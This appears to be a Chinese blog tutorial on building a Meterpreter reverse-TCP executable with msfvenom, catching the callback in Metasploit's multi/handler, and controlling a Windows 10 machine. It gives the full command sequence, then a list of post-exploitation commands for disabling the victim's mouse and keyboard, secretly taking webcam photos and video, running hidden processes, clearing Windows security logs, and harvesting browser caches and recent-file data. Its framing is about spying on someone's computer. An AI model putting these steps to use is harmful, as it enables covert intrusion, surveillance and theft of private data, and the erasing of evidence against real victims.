kali关闭防火墙_kali的Meterpreter控制win10，可以偷看你的电脑的所有数据

Meterpreter

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

查看kali和window的ip

在kali终端ifconfig，ip是192.168.0.103

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe

生成met.exe可执行的exe，并点击执行。

复制到win10主机，需要关闭window的防火墙

window点击exe前，kali需要进入msfconsole， 5555需要对应

msfconsolemsf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.0.103lhost => 192.168.0.103msf5 exploit(multi/handler) > set lport 5555lport => 5555

exploit命令发起攻击

在window桌面不小心放在重要的文件，直接cat查询

补充下，msfconsole的一些命令，只有控制了window，下面的命令都可以执行。

# 让他不能用鼠标uictl开关键盘/鼠标uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标uictl disable mouse  #禁用鼠标uictl disable keyboard  #禁用键盘 # 如果开了摄像头拍照webcam摄像头命令webcam_list  #查看摄像头webcam_snap   #通过摄像头拍照webcam_stream   #通过摄像头开启视频execute执行文件execute #在目标机中执行文件execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互# clearav清除日志clearav  #清除windows中的应用程序日志、系统日志、安全日志# 基本网络命令ipconfig/ifconfignetstat –anoarpgetproxy   #查看代理信息route   #查看路由# 信息收集的脚本位于：/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather# 信息收集的脚本较多，仅列几个常用的：run post/windows/gather/checkvm #是否虚拟机run post/linux/gather/checkvm #是否虚拟机run post/windows/gather/forensics/enum_drives #查看分区run post/windows/gather/enum_applications #获取安装软件信息run post/windows/gather/dumplinks   #获取最近的文件操作run post/windows/gather/enum_ie  #获取IE缓存run post/windows/gather/enum_chrome   #获取Chrome缓存run post/windows/gather/enum_patches  #补丁信息run post/windows/gather/enum_domain  #查找域控

其实很弄别人是不行的，别人怎么会傻傻的关防火墙。